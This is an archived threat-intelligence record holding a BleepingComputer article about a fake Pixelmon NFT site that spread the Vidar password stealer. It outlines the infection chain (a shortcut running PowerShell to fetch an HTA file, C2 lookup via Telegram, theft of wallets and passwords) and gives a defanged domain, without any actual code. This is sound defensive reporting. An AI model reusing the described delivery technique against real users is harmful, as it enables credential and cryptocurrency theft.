{
	"id": "dd7dbfdb-8eb4-432a-96e4-3b629eb683d4",
	"created_at": "2026-04-06T00:11:59.392852Z",
	"updated_at": "2026-04-10T13:11:46.645022Z",
	"deleted_at": null,
	"sha1_hash": "d35699b38632512bd80b8895894c919b80d6e693",
	"title": "Fake Pixelmon NFT site infects you with password-stealing malware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2401726,
	"plain_text": "Fake Pixelmon NFT site infects you with password-stealing malware\r\nBy Lawrence Abrams\r\nPublished: 2022-05-15 · Archived: 2026-04-05 17:20:15 UTC\r\nA fake Pixelmon NFT site entices fans with free tokens and collectibles while infecting them with malware that steals their\r\ncryptocurrency wallets.\r\nPixelmon is a popular NFT project whose roadmap includes creating an online metaverse game where you can collect, train,\r\nand battle other players using pixelmon pets.\r\nWith close to 200,000 Twitter followers and over 25,000 Discord members, the project has garnered a lot of interest.\r\nhttps://www.bleepingcomputer.com/news/security/fake-pixelmon-nft-site-infects-you-with-password-stealing-malware/\r\nPage 1 of 6\n\n0:00\r\nhttps://www.bleepingcomputer.com/news/security/fake-pixelmon-nft-site-infects-you-with-password-stealing-malware/\r\nPage 2 of 6\n\nVisit Advertiser websiteGO TO PAGE\r\nImpersonating the Pixelmon project\r\nTo take advantage of this interest, threat actors have copied the legitimate pixelmon.club website and created a fake version\r\nat pixelmon[.]pw to distribute malware.\r\nThis site is almost a replica of the legitimate site, but instead of offering a demo of the project's game, the malicious site\r\noffers executables that install password-stealing malware on a device.\r\nFake Pixelmon website\r\nSource: BleepingComputer\r\nThe site is offering a file called Installer.zip that contains an executable that appears to be corrupt and does not infect users\r\nwith any malware.\r\nHowever, MalwareHunterTeam, who first discovered this malicious site, found other malicious files distributed by the site\r\nthat allowed us to see what malware it was spreading.\r\nOne of the files distributed by this malicious site is setup.zip, which contains the setup.lnk file. Setup.lnk is a Windows\r\nshortcut that will execute a PowerShell command to download a system32.hta file from pixelmon[.]pw.\r\nhttps://www.bleepingcomputer.com/news/security/fake-pixelmon-nft-site-infects-you-with-password-stealing-malware/\r\nPage 3 of 6\n\nSetup.lnk contents\r\nSource: BleepingComputer\r\nWhen BleepingComputer tested these malicious payloads, the System32.hta file downloaded Vidar, a password-stealing\r\nmalware that is not as commonly used as it was in the past. This was confirmed by security researcher Fumik0_, who has\r\npreviously analyzed this malware family.\r\nWhen executed, the threat actor's Vidar sample will connect to a Telegram channel and retrieve the IP address of a malware's\r\ncommand and control server.\r\nTelegram channel containing C2 IP address\r\nSource: BleepingComputer\r\nThe malware will then retrieve a configuration command from the C2 and download further modules to be used to steal data\r\nfrom the infected device.\r\nThe Vidar malware can steal passwords from browsers and applications and search a computer for files that match specific\r\nnames, which are then uploaded to the threat actor.\r\nAs you can see from the malware configuration below, the C2 instructs the malware to search for and steal various files,\r\nincluding text files, cryptocurrency wallets, backups, codes, password files, and authentication files.\r\nhttps://www.bleepingcomputer.com/news/security/fake-pixelmon-nft-site-infects-you-with-password-stealing-malware/\r\nPage 4 of 6\n\nConfiguration commands retrieved from the C2 server\r\nSource: BleepingComputer\r\nAs this is an NFT site, the expectation is that visitors will have cryptocurrency wallets installed on their computers. Due to\r\nthis, the threat actors emphasize searching for and stealing files related to cryptocurrency.\r\nWhile the site is currently not distributing a working payload, BleepingComputer has seen evidence that the threat actors\r\ncontinue to modify the site over the past few days, as payloads that were available two days ago are no longer present.\r\nDue to the activity on the site, we can expect this campaign to continue to be active and for working threats to be added\r\nsoon.\r\nWith NFT projects being overwhelmed with scams designed to steal your cryptocurrency, you should always triple-check\r\nthat the URL you are visiting is, in fact, related to the project you are interested in.\r\nFurthermore, never execute any executables from unknown websites without first scanning them with antivirus software or\r\nusing VirusTotal.\r\nAutomated Pentesting Covers Only 1 of 6 Surfaces.\r\nhttps://www.bleepingcomputer.com/news/security/fake-pixelmon-nft-site-infects-you-with-password-stealing-malware/\r\nPage 5 of 6\n\nAutomated pentesting proves the path exists. BAS proves whether your controls stop it. Most teams run one without the\r\nother.\r\nThis whitepaper maps six validation surfaces, shows where coverage ends, and provides practitioners with three diagnostic\r\nquestions for any tool evaluation.\r\nSource: https://www.bleepingcomputer.com/news/security/fake-pixelmon-nft-site-infects-you-with-password-stealing-malware/\r\nhttps://www.bleepingcomputer.com/news/security/fake-pixelmon-nft-site-infects-you-with-password-stealing-malware/\r\nPage 6 of 6",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.bleepingcomputer.com/news/security/fake-pixelmon-nft-site-infects-you-with-password-stealing-malware/"
	],
	"report_names": [
		"fake-pixelmon-nft-site-infects-you-with-password-stealing-malware"
	],
	"threat_actors": [],
	"ts_created_at": 1775434319,
	"ts_updated_at": 1775826706,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d35699b38632512bd80b8895894c919b80d6e693.pdf",
		"text": "https://archive.orkl.eu/d35699b38632512bd80b8895894c919b80d6e693.txt",
		"img": "https://archive.orkl.eu/d35699b38632512bd80b8895894c919b80d6e693.jpg"
	}
}